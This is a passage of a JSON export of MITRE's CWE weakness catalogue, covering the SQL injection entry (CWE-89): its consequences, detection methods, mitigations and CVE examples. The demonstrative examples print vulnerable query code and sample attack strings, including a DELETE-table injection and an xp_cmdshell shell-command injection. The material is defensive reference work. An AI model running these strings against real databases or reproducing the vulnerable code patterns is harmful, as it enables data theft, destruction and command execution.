Modification","attr":{"@_Date":"2019-09-19"}},{"#text":"Improper Delimitation of Arguments in a Command (\'Argument Injection\')","attr":{"@_Date":"2019-09-23"}}]}},"89":{"attr":{"@_ID":"89","@_Name":"Improper Neutralization of Special Elements used in an SQL Command (\'SQL Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands.","SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Database Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness typically appears in data-rich applications that save user inputs in a database."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL injection vulnerability."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or do not require any code changes.","Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke SQL commands, leading to false negatives - especially if the API/library code is not available for analysis."]},"Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Database Scanners"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly."]}},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using \\"exec\\" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]"]}},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":{"xhtml:p":["Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.","Specifically, follow the principle of least privilege when creating user accounts to a SQL database. The database users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others\' data. Use the strictest permissions possible on all database objects, such as execute-only for stored procedures."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).","Instead of building a new implementation, such features may be available in the database or programming language. For example, the Oracle DBMS_ASSERT package can check or enforce that parameters have certain properties that make them less vulnerable to SQL injection. For MySQL, the mysql_real_escape_string() API function is available in both C and PHP."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When constructing SQL query strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing SQL injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent SQL injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, the name \\"O\'Reilly\\" would likely pass the validation step, since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the \\"\'\\" apostrophe character, which would need to be escaped or otherwise handled. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded.","When feasible, it may be safest to disallow meta-characters entirely, instead of escaping them. This will provide some defense in depth. After the data is entered into the database, later processes may neglect to escape meta-characters before use, and you may not have control over those processes."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of SQL Injection, error messages revealing the structure of a SQL query can help attackers tailor successful attack strings."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code."},{"Intro_Text":"The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...string userName = ctx.getAuthenticatedUserName();string query = \\"SELECT * FROM items WHERE owner = \'\\" + userName + \\"\' AND itemname = \'\\" + ItemName.Text + \\"\'\\";sda = new SqlDataAdapter(query, conn);DataTable dt = new DataTable();sda.Fill(dt);...","xhtml:br":["","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":"SELECT * FROM items WHERE owner = &lt;userName&gt; AND itemname = &lt;itemName&gt;;"},{"attr":{"@_Nature":"attack"},"xhtml:div":"name\' OR \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\' OR \'a\'=\'a\';"},{"attr":{"@_Nature":"attack"},"xhtml:div":"OR \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT * FROM items;"}],"Body_Text":["The query that this code intends to execute follows:","However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string:","for itemName, then the query becomes the following:","The addition of the:","condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:","This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner."]},{"Intro_Text":"This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example.","Body_Text":["If an attacker with the user name wiley enters the string:","for itemName, then the query becomes the following two queries:","Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.","Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example.","If an attacker enters the string","Then the following three valid statements will be created:","One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from an allowlist of safe values or identify and escape a denylist of potentially malicious values. Allowlists can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, denylisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Target fields that are not quoted"},{"xhtml:div":"Find ways to bypass the need for certain escaped meta-characters"},{"xhtml:div":"Use stored procedures to hide the injected meta-characters."}]}},"Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.","Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they do not protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.","Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks."],"Example_Code":[{"attr":{"@_Nature":"attack"},"xhtml:div":"name\'; DELETE FROM items; --"},{"attr":{"@_Nature":"attack","@_Language":"SQL"},"xhtml:div":{"#text":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\';DELETE FROM items;","xhtml:br":["","",""],"xhtml:i":"--\'"}},{"attr":{"@_Nature":"attack"},"xhtml:div":"name\'; DELETE FROM items; SELECT * FROM items WHERE \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\';DELETE FROM items;SELECT * FROM items WHERE \'a\'=\'a\';","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"procedure get_item ( itm_cv IN OUT ItmCurTyp, usr in varchar2, itm in varchar2)is open itm_cv for\' SELECT * FROM items WHERE \' || \'owner = \'|| usr || \' AND itemname = \' || itm || \';end get_item;","xhtml:br":["","",""]}}]},{"Intro_Text":"MS SQL has a built in function that enables shell command execution. An SQL injection in such a context could be disastrous. For example, a query of the form:","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'$user_input\' ORDER BY PRICE"},{"attr":{"@_Nature":"attack"},"xhtml:div":"\'; exec master..xp_cmdshell \'dir\' --"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'\'; exec master..xp_cmdshell \'dir\' --\' ORDER BY PRICE"}],"Body_Text":["Where $user_input is taken from an untrusted source.","If the user provides the string:","The query will take the following form:","Now, this query can be broken down into:",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a first SQL query: SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'\';"},{"xhtml:div":"a second SQL query, which executes the dir command in the shell: exec master..xp_cmdshell \'dir\'"},{"xhtml:div":"an MS SQL comment: --\' ORDER BY PRICE"}]}},"As can be seen, the malicious input changes the semantics of the query into a query, a shell command execution and a comment."]},{"Intro_Text":"This code intends to print a message summary given the message ID.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$id = $_COOKIE[\\"mid\\"];mysql_query(\\"SELECT MessageID, Subject FROM messages WHERE MessageID = \'$id\'\\");","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"1432\' or \'1\' = \'1"},{"attr":{"@_Nature":"result"},"xhtml:div":"SELECT MessageID, Subject FROM messages WHERE MessageID = \'1432\' or \'1\' = \'1\'"},{"attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:div":{"#text":"$id = intval($_COOKIE[\\"mid\\"]);mysql_query(\\"SELECT MessageID, Subject FROM messages WHERE MessageID = \'$id\'\\");","xhtml:br":""}}],"Body_Text":["The programmer may have skipped any input validation on $id under the assumption that attackers cannot modify the cookie. However, this is easy to do with custom client code or even in the web browser.","While $id is wrapped in single quotes in the call to mysql_query(), an attacker could simply change the incoming mid cookie to:","This would produce the resulting query:","Not only will this retrieve message number 1432, it will retrieve all other messages.","In this case, the programmer could apply a simple modification to the code to eliminate the SQL injection:","However, if this code is intended to support multiple users with different message boxes, the code might also need an access control check (CWE-285) to ensure that the application user has the permission to see that message."]},{"Intro_Text":"This example attempts to take a last name provided by a user and enter it into a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$userKey = getUserID();$name = getUserInput();$name = allowList($name, \\"^a-zA-z\'-$\\");$query = \\"INSERT INTO last_names VALUES(\'$userKey\', \'$name\')\\";","xhtml:br":["","","","",""],"xhtml:i":"# ensure only letters, hyphens and apostrophe are allowed"}},"Body_Text":"While the programmer applies a allowlist to the user input, it has shortcomings. First of all, the user is still allowed to provide hyphens, which are used as comment structures in SQL. If a user specifies \\"--\\" then the remainder of the statement will be treated as a comment, which may bypass security logic. Furthermore, the allowlist permits the apostrophe, which is also a data / command separator in SQL. If a user supplies a name with an apostrophe, they may be able to alter the structure of the whole statement and even change control flow of the program, possibly accessing or modifying confidential information. In this situation, both the hyphen and apostrophe are legitimate characters for a last name and permitting them is required. Instead, a programmer may want to use a prepared statement or apply an encoding routine to the input to prevent any data / directive misinterpretations."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0366","Description":"chain: SQL injection in library intended for database authentication allows SQL injection and authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0366"},{"Reference":"CVE-2008-2790","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2790"},{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"},{"Reference":"CVE-2007-6602","Description":"SQL injection via user name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6602"},{"Reference":"CVE-2008-5817","Description":"SQL injection via user name or password fields.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5817"},{"Reference":"CVE-2003-0377","Description":"SQL injection in security product, using a crafted group name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0377"},{"Reference":"CVE-2008-2380","Description":"SQL injection in authentication library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2380"},{"Reference":"CVE-2017-11508","Description":"SQL injection in vulnerability management and reporting tool, using a crafted password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11508"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"SQL injection"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"SQL Injection"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"SQL injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":19,"Entry_Name":"SQL Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-89"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS00-J","Entry_Name":"Prevent SQL injection","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"109"}},{"attr":{"@_CAPEC_ID":"110"}},{"attr":{"@_CAPEC_ID":"470"}},{"attr":{"@_CAPEC_ID":"66"}},{"attr":{"@_CAPEC_ID":"7"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 1: SQL Injection.&#34; Page 3"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 12, &#34;Database Input Issues&#34; Page 397"}},{"attr":{"@_External_Reference_ID":"REF-867"}},{"attr":{"@_External_Reference_ID":"REF-868"}},{"attr":{"@_External_Reference_ID":"REF-869"}},{"attr":{"@_External_Reference_ID":"REF-870"}},{"attr":{"@_External_Reference_ID":"REF-871"}},{"attr":{"@_External_Reference_ID":"REF-872"}},{"attr":{"@_External_Reference_ID":"REF-873"}},{"attr":{"@_External_Reference_ID":"REF-874"}},{"attr":{"@_External_Reference_ID":"REF-875"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;SQL Queries&#34;, Page 431"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;SQL Injection&#34;, Page 1061"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-89"}}]},"Notes":{"Note":{"#text":"SQL injection can be resultant from special character mismanagement, MAID, or denylist/allowlist problems. It can be primary to authentication errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Modes_of_Introduction, Name, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name, Related_Attack_Patterns"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, Observed_Examples, References, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated 